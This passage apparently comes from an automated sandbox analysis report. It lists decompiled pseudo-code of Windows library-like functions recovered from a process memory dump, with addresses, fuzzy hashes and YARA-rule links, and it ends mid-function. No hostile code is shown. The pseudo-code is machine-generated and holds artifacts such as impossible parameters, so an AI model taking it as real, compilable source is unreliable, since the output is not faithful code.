				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E02B753CA(0);
						return E02B4D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E02B3F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E02B13690(1, _t117, 0x2ad1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E02B3AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L02B14620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E02B3AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E02B7500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E02B39860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                        0x02b751be
                        0x02b751c3
                        0x02b751c8
                        0x02b751cd
                        0x02b751d0
                        0x02b751d3
                        0x02b751d8
                        0x02b751db
                        0x02b751de
                        0x02b751e0
                        0x02b751e3
                        0x02b751e6
                        0x02b751e8
                        0x02b75342
                        0x02b75351
                        0x02b75356
                        0x02b7535a
                        0x02b75360
                        0x02b75363
                        0x02b75366
                        0x02b75369
                        0x02b75369
                        0x02b7536b
                        0x02b7536b
                        0x02b75370
                        0x02b753a3
                        0x02b753a4
                        0x02b753a6
                        0x02b753ab
                        0x02b753ab
                        0x02b753ae
                        0x02b753ae
                        0x02b753b5
                        0x02b753bf
                        0x02b753bf
                        0x02b75375
                        0x02b75396
                        0x02b753a0
                        0x02b753a0
                        0x00000000
                        0x02b75396
                        0x02b75377
                        0x02b75379
                        0x02b7537f
                        0x02b7538c
                        0x02b75390
                        0x00000000
                        0x02b75390
                        0x02b751ee
                        0x02b751f1
                        0x02b75301
                        0x02b75310
                        0x02b75315
                        0x02b75318
                        0x02b7531b
                        0x02b75320
                        0x02b7532e
                        0x02b75331
                        0x00000000
                        0x02b75331
                        0x02b75328
                        0x02b75329
                        0x00000000
                        0x02b75329
                        0x02b751fa
                        0x02b75235
                        0x02b75236
                        0x02b75239
                        0x02b7523f
                        0x02b75240
                        0x02b75241
                        0x02b75242
                        0x02b75246
                        0x02b75247
                        0x02b7524e
                        0x02b75251
                        0x02b75267
                        0x02b75269
                        0x02b7526e
                        0x02b7527d
                        0x02b7527e
                        0x02b75281
                        0x02b75282
                        0x02b75287
                        0x02b75288
                        0x02b7528a
                        0x02b7528f
                        0x02b75294
                        0x00000000
                        0x00000000
                        0x02b7529a
                        0x02b7529c
                        0x02b7529e
                        0x02b7529e
                        0x02b752a4
                        0x02b752b0
                        0x00000000
                        0x00000000
                        0x02b752ba
                        0x02b752bc
                        0x02b752bc
                        0x02b752d4
                        0x02b752d9
                        0x02b752dc
                        0x02b752e1
                        0x00000000
                        0x00000000
                        0x02b752e7
                        0x02b752f4
                        0x00000000
                        0x02b752f4
                        0x02b75270
                        0x00000000
                        0x02b75270
                        0x02b751fc
                        0x02b751fd
                        0x02b75202
                        0x02b75203
                        0x02b75205
                        0x02b7520a
                        0x02b7520f
                        0x00000000
                        0x00000000
                        0x02b7521b
                        0x02b75226
                        0x02b7522b
                        0x02b7521d
                        0x02b7521d
                        0x02b75222
                        0x02b75222
                        0x02b7522d
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: 0c676536eeb71be75370ee2e17514e5817a14dafb4380da3de8462778635fa85
                        • Instruction ID: d8dfbba44f39227040aaa4ddcbcf8d10880123556be7a9301c4f2cef15aeba10
                        • Opcode Fuzzy Hash: 0c676536eeb71be75370ee2e17514e5817a14dafb4380da3de8462778635fa85
                        • Instruction Fuzzy Hash: F6517D71A046089FDB24DFA8C880BADBBF9FB48704F5580ADE95AEB251DB709900CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E02AFB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x2bcf7a8);
				E02B4D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E02B4D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E02B3D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E02B3F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L02B4DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E02B3B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E02B3B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E02B3E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E02B3A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                        0x02afb171
                        0x02afb171
                        0x02afb171
                        0x02afb171
                        0x02afb171
                        0x02afb176
                        0x02afb17b
                        0x02afb180
                        0x02afb186
                        0x02afb18f
                        0x02afb198
                        0x02afb1a4
                        0x02afb1aa
                        0x02b54802
                        0x02b54802
                        0x02b54805
                        0x02b5480c
                        0x02b5480e
                        0x02afb1d1
                        0x02afb1d3
                        0x02afb1de
                        0x02afb1de
                        0x02b54817
                        0x02b5481e
                        0x02b54820
                        0x02b54822
                        0x02b54822
                        0x02b54824
                        0x02b54824
                        0x02b5482a
                        0x00000000
                        0x00000000
                        0x02b54835
                        0x02b5483a
                        0x02b5483d
                        0x02b5483f
                        0x02b54842
                        0x02b54842
                        0x02b54842
                        0x02b54846
                        0x02b5484c
                        0x02b5484e
                        0x02b54851
                        0x02b54851
                        0x02b54853
                        0x02b54854
                        0x02b54854
                        0x02b54858
                        0x02b5485a
                        0x02b5485a
                        0x02b5485d
                        0x02b5485f
                        0x02b54861
                        0x02b54861
                        0x02b54866
                        0x02b5486b
                        0x02b5486e
                        0x02b54871
                        0x02b54876
                        0x02b54876
                        0x02b54878
                        0x02b5487b
                        0x02b54884
                        0x02b54884
                        0x00000000
                        0x02b5487d
                        0x02b5487d
                        0x02b54882
                        0x02b54889
                        0x02b54889
                        0x02b5488f
                        0x02b54891
                        0x02b548e0
                        0x02b548e2
                        0x02b548e4
                        0x02b548e4
                        0x02b548e7
                        0x02b548e7
                        0x02b548ed
                        0x02b548f4
                        0x02b548f6
                        0x02b54951
                        0x02b54951
                        0x02b54953
                        0x02b54953
                        0x02b54956
                        0x02b54956
                        0x02b54958
                        0x02b54959
                        0x02b54959
                        0x02b5495d
                        0x02b5495d
                        0x02b5495f
                        0x02b5495f
                        0x02b54965
                        0x02b54969
                        0x02b549ba
                        0x02b549ba
                        0x02b549c1
                        0x02b549c5
                        0x02b549cc
                        0x02b549d4
                        0x02b549d7
                        0x02b549da
                        0x02b549e4
                        0x02b549e5
                        0x02b549f3
                        0x02b54a02
                        0x00000000
                        0x02b54a02
                        0x02b54972
                        0x02b54974
                        0x00000000
                        0x00000000
                        0x02b54976
                        0x02b54979
                        0x02b54982
                        0x02b54983
                        0x02b54984
                        0x02b5498b
                        0x02b5498d
                        0x02b54991
                        0x02b54993
                        0x02b54999
                        0x02b5499d
                        0x02b549a2
                        0x02b549a2
                        0x02b549a2
                        0x02b54999
                        0x02b549ac
                        0x00000000
                        0x02b549b3
                        0x02b548f8
                        0x02b548fe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b548fe
                        0x02b54895
                        0x02b5489c
                        0x02b548ad
                        0x02b548b2
                        0x02b548b5
                        0x02b548b7
                        0x02b548ba
                        0x02b548bc
                        0x02b548c6
                        0x02b548c6
                        0x02b548cb
                        0x02b548d1
                        0x02b548d4
                        0x02b548d8
                        0x02b548d8
                        0x00000000
                        0x02b548d8
                        0x02b548be
                        0x02b548c0
                        0x00000000
                        0x00000000
                        0x02b548c2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b548c4
                        0x00000000
                        0x02b54882
                        0x02b5487b
                        0x02b54904
                        0x02b54906
                        0x00000000
                        0x00000000
                        0x02b54908
                        0x02b5490e
                        0x00000000
                        0x00000000
                        0x02b54910
                        0x02b54917
                        0x02b54917
                        0x00000000
                        0x02b54917
                        0x02afb1ba
                        0x02b547f9
                        0x02b547fc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b547fc
                        0x02afb1c0
                        0x02afb1c0
                        0x02afb1c3
                        0x02afb1cb
                        0x00000000
                        0x00000000
                        0x00000000

                        APIs
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: _vswprintf_s
                        • String ID:
                        • API String ID: 677850445-0
                        • Opcode ID: e668b671d083beddac5713e4996b1c771153d04b15ac73d104a175e61bd725cb
                        • Instruction ID: d1188a93e97993f3beba604d796bf1b277ba30491df9fb5c9acfac9052c41f7f
                        • Opcode Fuzzy Hash: e668b671d083beddac5713e4996b1c771153d04b15ac73d104a175e61bd725cb
                        • Instruction Fuzzy Hash: E951DC71D002A98FEF218F68C845BAEBBB1FF04714F2041E9ED59AB281D7785985CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B1B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                        Download Yara Rule
                        C-Code - Quality: 76%
                        			E02B1B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x2bed360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E02B17D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E02BC8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E02B39E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E02B3B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E02B3CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E02B17D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E02BC8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E02B3AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x2be8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x2be862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x2be8628; // 0x0
							_t116 =  *0x2be862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                        0x02b1b94c
                        0x02b1b956
                        0x02b1b95c
                        0x02b1b95e
                        0x02b1b964
                        0x02b1b969
                        0x02b1b96d
                        0x02b1b96d
                        0x02b1b970
                        0x02b1b974
                        0x02b1b97a
                        0x02b1badf
                        0x02b1badf
                        0x02b1bae2
                        0x02b1bae4
                        0x02b1bae6
                        0x02b1baf0
                        0x02b62cb8
                        0x02b1baf6
                        0x02b1baf6
                        0x02b1baf6
                        0x02b1bafd
                        0x02b1bb1f
                        0x02b1bb1f
                        0x02b1baff
                        0x02b1bb00
                        0x02b1bb00
                        0x02b1bb03
                        0x02b1bb03
                        0x02b1bacb
                        0x02b1bacf
                        0x02b1bad0
                        0x02b1bad1
                        0x02b1badc
                        0x02b1badc
                        0x02b1b980
                        0x02b1b980
                        0x02b1b988
                        0x02b1b98b
                        0x02b1b98d
                        0x02b1b990
                        0x02b1b993
                        0x02b1b999
                        0x02b1b99b
                        0x02b1b9a1
                        0x02b1b9a5
                        0x02b1b9aa
                        0x02b1b9b0
                        0x02b1b9bb
                        0x02b1b9c0
                        0x02b1b9c3
                        0x02b1b9ca
                        0x02b1b9cc
                        0x02b1b9cf
                        0x02b1b9d3
                        0x02b1b9d7
                        0x02b1ba94
                        0x02b1ba94
                        0x02b1ba98
                        0x02b1baa3
                        0x02b62ccb
                        0x02b1baa9
                        0x02b1baa9
                        0x02b1baa9
                        0x02b1bab1
                        0x02b62cd5
                        0x02b62cdd
                        0x02b62cdd
                        0x02b1babb
                        0x02b1babc
                        0x02b1bac2
                        0x02b1bac3
                        0x02b1bac3
                        0x02b1bac6
                        0x00000000
                        0x02b1b9dd
                        0x02b1b9dd
                        0x02b1b9e7
                        0x02b1b9e7
                        0x02b1b9ec
                        0x02b1b9ec
                        0x02b1b9f1
                        0x02b1b9f5
                        0x02b1b9fa
                        0x02b1ba00
                        0x02b1ba0c
                        0x02b1ba10
                        0x02b1ba10
                        0x02b1ba12
                        0x02b1ba18
                        0x00000000
                        0x00000000
                        0x02b1bb26
                        0x02b1bb26
                        0x02b1ba1e
                        0x02b1ba1e
                        0x02b1ba23
                        0x02b1ba25
                        0x02b1ba2c
                        0x02b1ba30
                        0x02b1ba35
                        0x02b1ba35
                        0x02b1ba41
                        0x02b1ba46
                        0x02b1ba4c
                        0x02b1ba50
                        0x02b1ba54
                        0x02b1ba6a
                        0x02b1ba6e
                        0x02b1ba70
                        0x02b1ba74
                        0x02b1ba78
                        0x02b1ba7a
                        0x02b1ba7c
                        0x02b1ba8e
                        0x02b1ba90
                        0x02b1ba92
                        0x02b1bb14
                        0x02b1bb14
                        0x02b1bb16
                        0x02b1bb16
                        0x00000000
                        0x02b1ba7c
                        0x02b1bb0a
                        0x02b1bb0d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b1bb0f

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02B1B9A5
                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 885266447-0
                        • Opcode ID: 0d6228646710c22f5297fbbe5cdfe0c0e9a357b629124264a0425751dd222705
                        • Instruction ID: ce70d3080985adc002a22e796ffc6e3fd8cdf052929c211c26dd82dfb727182c
                        • Opcode Fuzzy Hash: 0d6228646710c22f5297fbbe5cdfe0c0e9a357b629124264a0425751dd222705
                        • Instruction Fuzzy Hash: 3B515971A18740CFC720DF29C480A2BBBE5FB88748F9449AEF99597354DB70E844CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B22581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 83%
                        			E02B22581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, void* _a1546912430) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				signed int _t246;
				signed int _t248;
				intOrPtr _t250;
				signed int _t253;
				signed int _t260;
				signed int _t263;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				void* _t282;
				void* _t283;
				signed int _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t294;
				signed int _t298;
				intOrPtr _t318;
				signed int _t327;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				signed int _t338;
				signed int _t340;
				signed int _t342;
				void* _t343;
				signed int _t345;
				void* _t346;

				_t340 = _t342;
				_t343 = _t342 - 0x4c;
				_v8 =  *0x2bed360 ^ _t340;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t334 = 0x2beb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t287 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t346 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t277 = 0x48;
				_t308 = 0 | _t346 == 0x00000000;
				_t327 = 0;
				_v37 = _t346 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t277 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t335 = 0xc0000106;
